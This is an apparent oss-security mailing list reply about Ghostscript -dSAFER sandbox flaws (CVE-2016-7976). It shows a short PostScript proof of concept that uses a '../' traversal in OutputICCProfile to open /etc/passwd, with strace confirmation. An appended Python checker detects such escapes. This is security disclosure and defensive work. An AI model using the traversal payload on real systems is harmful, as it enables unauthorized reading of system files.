Date: Wed, 19 Oct 2016 16:29:43 +0200
From: Cedric Buissart <cbuissar@...hat.com>
To: oss-security@...ts.openwall.com
Cc: taviso@...gle.com
Subject: Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems

On Wed, Oct 5, 2016 at 8:04 PM, <cve-assign@...re.org> wrote:
>
> > bug: various userparams allow %pipe% in paths, allowing remote shell
> > command execution.
> > id: http://bugs.ghostscript.com/show_bug.cgi?id=697178
> > repro: http://www.openwall.com/lists/oss-security/2016/09/30/8
> > patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=71ac87493b1e445d6c07554d4246cf7d4f44875c
>
> Use CVE-2016-7976.
>
> There currently isn't a separate CVE ID for the earlier impact that
> occurred when "b" was in the mode argument to popen. The question of
> whether popen will execute anyway (even with the "b" character) is,
> more or less, a reachability concern in this context, and doesn't mean
> that a second vulnerability needs to be defined.

The original report for this bug
(http://bugs.ghostscript.com/show_bug.cgi?id=697178), as described by
Florian, mentioned a directory traversal issue. The directory traversal
does not appear to be resolved after applying the given patch:

$ cat putdevice-open.ps
%!PS
% Set the OutputICCProfile device parameter to a path that climbs out of
% the iccprofiles directory it is resolved under (see the strace output).
currentdevice null true mark
  /OutputICCProfile (../../../../../etc/passwd)
.putdeviceparams
quit

$ strace -f -e open gs -dSAFER putdevice-open.ps |& grep passwd
open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 6

Is it expected?

-- 
Cedric Buissart, Product Security
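The property the strace test above is probing is containment: a profile name handed to a device parameter must still resolve inside the iccprofiles directory after normalization. The following is an added example, not part of the message and not Ghostscript's own code, of that check together with a scan over strace `open()` lines that flags paths which start under the directory but escape it. The base directory is the 9.20 one shown in the strace output, and the strace lines fed to the scan are constructed for the demo (the first copies the one in the message, the others are made up for contrast).

```python
import posixpath
import re

# Base directory against which Ghostscript resolved the profile name in the
# strace output above (the 9.20 path is taken from that output; it is only
# an assumption for this demo and any install prefix would do).
ICC_BASE = "/usr/share/ghostscript/9.20/iccprofiles"

# Constructed strace lines: the first is the one quoted in the message, the
# rest are invented benign opens to show the scan leaves them alone.
SAMPLE_STRACE = [
    'open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 6',
    'open("/usr/share/ghostscript/9.20/iccprofiles/default_rgb.icc", O_RDONLY) = 5',
    '[pid  4242] openat(AT_FDCWD, "/usr/share/ghostscript/9.20/iccprofiles/sub/../gray.icc", O_RDONLY) = 7',
    'open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3',
]


def resolves_inside(base, candidate):
    """Lexically resolve `candidate` against `base`.

    Returns the normalized absolute path when it stays at or below `base`,
    and None when it escapes, whether via '..' segments or because the
    candidate is itself absolute. Lexical only: a symlink placed under
    `base` is not followed here, so a deployment check that cares about
    that must additionally realpath() the result on the live filesystem.
    """
    base_norm = posixpath.normpath(base)
    # posixpath.join drops `base` when `candidate` is absolute, which is
    # exactly the case normpath then exposes as an escape.
    target = posixpath.normpath(posixpath.join(base_norm, candidate))
    prefix = base_norm.rstrip("/") + "/"
    if target == base_norm or target.startswith(prefix):
        return target
    return None


# open("...") or openat(AT_FDCWD, "..."), with the optional "[pid N]" prefix
# that strace -f adds to lines from child processes.
OPEN_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?open(?:at)?\((?:AT_FDCWD,\s*)?"([^"]*)"'
)


def escaped_opens(strace_lines, base):
    """Return (raw_path, resolved_path) for every open() whose path begins
    under `base` textually but lands outside it after normalization."""
    base_norm = posixpath.normpath(base)
    hits = []
    for line in strace_lines:
        m = OPEN_RE.match(line)
        if not m:
            continue
        raw = m.group(1)
        if not (raw == base_norm or raw.startswith(base_norm + "/")):
            continue  # opened somewhere else entirely: not an escape from base
        if resolves_inside(base, raw) is None:
            hits.append((raw, posixpath.normpath(raw)))
    return hits


def main():
    for raw, resolved in escaped_opens(SAMPLE_STRACE, ICC_BASE):
        print(f"traversal: {raw} -> {resolved}")
    for name in ("default_rgb.icc", "../../../../../etc/passwd", "/etc/passwd"):
        verdict = resolves_inside(ICC_BASE, name)
        print(f"{name!r}: {'ok ' + verdict if verdict else 'rejected'}")


if __name__ == "__main__":
    main()
```

Run it as a script to see the traversal line from the message reported as resolving to /etc/passwd while the two benign profile opens pass; to use the scan on a real run, feed it the output of the same `strace -f -e open gs -dSAFER ...` command line by line.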